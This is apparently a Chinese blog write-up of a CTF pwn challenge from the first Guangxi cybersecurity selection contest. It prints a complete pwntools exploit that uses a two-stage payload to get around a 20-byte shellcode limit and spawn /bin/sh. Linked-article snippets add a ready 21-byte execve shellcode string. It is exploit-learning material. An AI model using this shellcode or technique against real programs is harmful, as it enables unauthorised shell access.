一个简单的 shellcode pwn题 广西首届网络安全选拔赛

最新推荐文章于 2024-08-23 17:36:53 发布
最新推荐文章于 2024-08-23 17:36:53 发布
阅读量877 收藏 1
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/90947971
版权

这个题 唯一的难点就是 shellcode  的 只是给了 0x14的大小

本来这个题 不打算发博客  但是有小姐姐看 ~~~ 就写一篇发上来把

然后我们看一下 程序的大概内容

{说一个很沙雕的事情 由于这个程序的特殊性  f5没有办法 看出来  然后 负责人这个b心情又不好

然后我把这个程序的 call eax  搞成nop

 

f5 一把梭 

 

}

23333  所以 这个题 其实也就是 重点是先 shellcode  把那个参数改的大一些就好了  push ret 一把梭 

emmm  感觉 都给注释了 直接看exp把
 

import sys
from pwn import *
#context.log_level='debug'
#context.arch='amd64'

if len(sys.argv)==1 :
	io=process('./pwn_1')
	elf=ELF('./pwn_1')
	#libc=ELF('')

pay='\xC7\x44\x24\x08\x44\x00\x00\x00'
#mov    dword ptr [esp + 8], 0x44
pay+=asm("push 0x0804848E")
pay+=asm("ret")
print len(pay)
gdb.attach(io,'b *0x080484CB')
io.sendline(pay)
io.recv()


pay=asm("push   0xb")
pay+=asm("pop    eax")
pay+=asm("cdq")
pay+=asm("push   edx")
pay+=asm("sub    ebp,8")
pay+=asm("mov    ebx,ebp")
pay+=asm("xor    ecx,ecx")
pay+=asm("int    0x80")
pay=pay.ljust(0x21,'a')
pay+='/bin/sh\x00'
print len(pay)
io.sendline(pay)


#pause()
io.interactive()

 

广西首届网络安全选拔赛PWNREVERSE决赛题目
zrools的博客
02-03 1万+
逆向和溢出没太多研究(无flag的为未解出),这两类和决赛题目放一起以减少篇幅!溢出类(PWN) PWN 在黑客俚语中代表着,攻破,取得权限,在CTF中它代表着溢出类的题目。 高水平溢出 分值:500 附件:55ed7cb0866ec 靶机:192.168.43.84 小张由于电脑被入侵,下场很惨,于是专心学习溢出,只是没想到从网上经过别人指点找到这个东东,完全不知道是什么。当时小张就瞬间蒙逼了
广西首届网络安全选拔赛 CRYPTO Writeup
zrools的博客
02-03 9556
密码学相关(CRYPTO) CRYPTO 是密码学的缩写,这一类的题目通常以破解密文为主,加密算法有可能是古典加密算法,也有可能是现代的加密算法,甚至有些是出者杜撰的加密算法。 大帝的秘密武器 分值:100 附件:55ed7caf2936e.txt 公元前一百年,在罗马处上了一位对世界影响巨大的人物,他是当时罗马三巨头之一。在执政生涯中,传言他率先使用了一种简单的加密函,因此这种加密方法以他的
广西首届网络安全选拔赛 WEB Writeup
热门推荐
zrools的博客
02-03 1万+
WEB安全(WEB) WEB 型就是最大众化的WEB漏洞的考察了,他会涉及到注入,代码执行,文件包含等常见的WEB漏洞。 管理员的愤怒 分值:100 靶机:192.168.43.134 阿水是某部门的网站管理员,一天他发现自己管理的网站被挂上了暗链,链接指向了一个IP。阿水非常愤怒,表示一定要给点对方颜色看看,但是这小子没学过渗透。下面给各位这个IP,看大家如何进入坏蛋的网站获得flag为阿水
广西首届网络安全选拔赛,Misc:似乎有秘密
Pai_Space
01-10 645
不是那么高级的隐写,换字体颜色 解码得到 flag
PWN-shellcode
MuMuLee_的博客
09-26 1883
构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。 题目: 1Ch=16+12=28,+esp=32:偏移量是32 能溢出:100-0x1c-4=68字节 C伪代码: 理论基础 函数返回步骤 : 保存返回值:函数返回值保存在EAX寄存器 弹出当前栈帧,恢复上一个栈帧 a) ESP + 当前栈帧大小:堆栈平衡基础上,降低栈顶,回收当前栈帧空间...
首届广西网络安全技术大赛初赛通关攻略_管理员的技能非常强悍,你如果乱说话,就让你提交不了(1)
m0_60567881的博客
04-12 1017
简单,一看就知道这个附件是一张置换表,按照这个表将密文再反着置换一遍,就能够得到明文。500分到手。
pwnshellcode收集
lifanxin的博客
02-25 5203
Write Upshellcode shellcode 这里对pwn中使用到的shellcode做了一个汇总,方便大家参考和使用。 # 32位 短字节shellcode --> 21字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 # 32位 纯ascii字符shellcode PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真
首届广西网络安全技术大赛初赛题目-encoded.zip
02-22
首届广西网络安全技术大赛初赛题目-encoded.zip
PWN测试题目
07-18
信息安全PWN测试题目:用于CTF的练习与PWN的学习,测试题目
pwn】记一道shellcode侧信道攻击
woodwhale的博客
10-16 4973
pwn】记一道shellcode侧信道攻击 前言 契机来源于K0nashi师傅给的一道题目,让我来写写shellcode,那当然是写啊! 分析 checksec之后发现保护全开,打开ida分析发现有沙箱,直接查看沙箱 可以使用read open,不能使用write,并且判断了A < 0x40000000。 再进入ida看看 先mmap一段可执行的chunk,然后可以写入0x18长度的shellcode,最后设立沙箱规则之后执行我们刚刚写入的shellcode。 那么一种新的思路就是侧信道攻击 简
广西首届网络安全选拔赛 bin文件的分析
qq_41071646的博客
06-08 1131
这个 一开始 我看着很简单 照着网上的也都做了 但是怎么也没有找到 backdoor 过了好多天 想起 很多文件夹一个一个试试 才找到这个文件 [~]$ binwalk -e '/home/pipixia/桌面/CTF.bin' DECIMAL HEXADECIMAL DESCRIPTIO...
二进制学习(pwn)-shellcode
liulanghouzi的博客
09-21 1789
帮助二进制安全爱好者入门~
PWN知识点整理(1)Shellcode
qq_52469954的博客
10-26 313
0day安全:软件漏洞分析技术(第2版)
PWN-shellcode-WP- (一)
qq_43390703的博客
03-29 1290
BITSCTF 2017-Command_Line、CSAW Quals CTF 2017-pilot、BSides San Francisco CTF 2017-b_64_b_tuff、 Openctf 2016-tyro_shellcode1比赛WP,从栈的结构、排列,汇编底层去分析理解,一步一步的解过程,通俗易懂且详细
pwn学习】pwn中的简单shellcode
Morphy_Amo的博客
12-20 1325
编写简单shellcode 在linux32位系统中,最简单的获取shell的方式是通过系统调用execve获得 execve('/bin/sh',0,0); 写成汇编的话如下: global _start _start: xor edx, edx xor ecx, ecx push '/sh' push '/bin' mov ebx, esp mov eax, 0xb int 80h 编译
pwn-shellcode执行
最新发布
GalaxySpaceX的博客
08-23 1237
pwn-shellcode执行
网络安全基础:从 HelloWorld 到 Shellcode 分析
网络安全是信息技术领域的一个核心组成部分,它涉及到保护网络系统、数据和用户免受恶意攻击、未经授权的访问以及隐私侵犯等威胁。在本套课程的第一章中,主要介绍了网络安全的概述,包括其重要性、基本概念以及常见...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值